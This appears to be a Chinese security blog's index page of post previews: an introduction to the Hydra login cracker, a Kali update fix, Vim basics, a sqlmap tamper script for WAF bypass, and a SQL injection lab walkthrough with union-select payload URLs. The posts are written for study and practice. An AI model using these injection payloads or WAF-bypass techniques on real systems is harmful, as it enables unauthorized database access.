密码破解神器Hydra
笔记总结软件运用
Hydra | 密码破解 | 神器

简介

每个密码安全研究显示表明,最大的安全漏洞之一是密码。 而九头蛇是一个并发的登录破解程序,支持许多协议攻击。新模块更容易添加,除此之外,Hydra是灵活和迅速的

Hydra在Linux,Windows/Cygwin,Solaris11,FreeBSD8.1,OpenBSD,OSX,QNX/Blackberry上测试和编译,并在GPLv3下提供了特殊的OpenSSL许可证扩展。
支持如下协议:

1
2
3
4
5
Asterisk,AFP,CiscoAAA,Ciscoauth,Ciscoenable,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,
HTTP-GET,HTTP-HEAD,HTTP-POST,HTTP-PROXY,HTTPS-FORM-GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-POST,HTTPS-HEAD,
HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,OracleListener,OracleSID,Oracle,
PC-Anywhere,PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,RTSP,S7-300,SAP/R3,SIP,SMB,SMTP,
SMTPEnum,SNMP,SOCKS5,SSH(v1andv2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth,VNCandXMPP.

阅读全文
kali更新技巧
学习资料kali
kali | 更新

更新出错问题解决

在kali下更新老是出现错误,如下:

1
2
3
4
5
6
7
8
9
W: GPG error: http://mirrors.ustc.edu.cn/kali kali-rolling InRelease: 
The following signatures were invalid: EXPKEYSIG ED444FF07D8D0BF6 
Kali Linux Repository <devel@kali.org> 
E: The repository 
'http://mirrors.ustc.edu.cn/kali kali-rolling InRelease' is not signed. 
N: Updating from such a repository can't be done securely, 
and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and 
user configuration details.

是因为系统太久没有更新了
解决的办法如下:

阅读全文
上古神器Vim总结运用
笔记总结软件运用
软件 | Vim | 编辑器

VIM是一个强大的编辑器,上古神器无须过多解释,linux必备!

VIM中的模式

  1. 普通模式
  2. 命令模式
  3. 编辑模式
  4. 视图模式

移动光标

h (左移) j (下移) k (上移) l (右移)
v键进入视图模式可以选择文本内容

阅读全文
Sqlmap之Tamper编写与使用
学习资料
SQL注入 | Sqlmap | Tamper

Tamper 简介

sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf

最小的例子

如下为一个最小的Tamper例子,作用是将payload中的单、双引号替换为\

1
2
3
4
5
6
7
8
9
10
11
# sqlmap/tamper/escapequotes.py

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    return payload.replace("'", "\\'").replace('"', '\\"')

阅读全文
Pentest之SQL过关纪实
实践运用
CTF | SQL注入

SQL injections

example1

http://192.168.132.131/sqli/example1.php?name=root //初看为字符串型

1.判断列数

http://192.168.132.131/sqli/example1.php?name=root' order by 5 –+ 成功
http://192.168.132.131/sqli/example1.php?name=root' order by 6 –+ 失败
列数为5

2.查询库名和版本号

http://192.168.132.131/sqli/example1.php?name=root%27%20union%20select%20database(),version(),user(),4,5 –+

1
得到库名为exercises ~~~~~~~ 数据库版本为5.1.66-0+squeeze1~~~~~~主机用户名:pentesterlab@localhost
阅读全文
Algolia